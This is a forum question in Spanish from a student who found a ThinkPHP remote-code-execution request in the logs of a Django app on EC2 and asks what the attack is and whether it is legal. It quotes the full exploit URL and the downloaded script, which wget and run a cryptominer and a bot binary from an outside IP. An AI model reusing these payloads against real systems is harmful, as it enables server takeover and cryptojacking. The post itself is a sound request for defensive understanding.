Desarrollé una aplicación Django para un proyecto escolar y la alojé en una instancia de EC2 para probar y aprender el entorno.
Durante la inspección de los registros, encontré la siguiente solicitud GET,
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472
Esto parece extraño porque no uso PHP, supongo que alguien asumió que uso PHP, luego intentó descargar y ejecutar un script ex.sh
desde 205.185.113.123
. El contenido de ese script es,
cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh
Como no conozco mucho las aplicaciones web y la seguridad, tengo algunas preguntas,
- ¿Esto es un ataque? Si es así, ¿cuál es el nombre de este ataque?
- ¿Se puede adaptar este ataque para Django en lugar de PHP?
- ¿Esto es normal para las aplicaciones web? ¿Siempre reciben este tipo de solicitudes?
- Según enlace , la dirección IP está registrada para una compañía llamada FranTech Solutions. ¿Están relacionados con este ataque?
- ¿Esto es ilegal? Si es así, ¿puedo emprender acciones legales?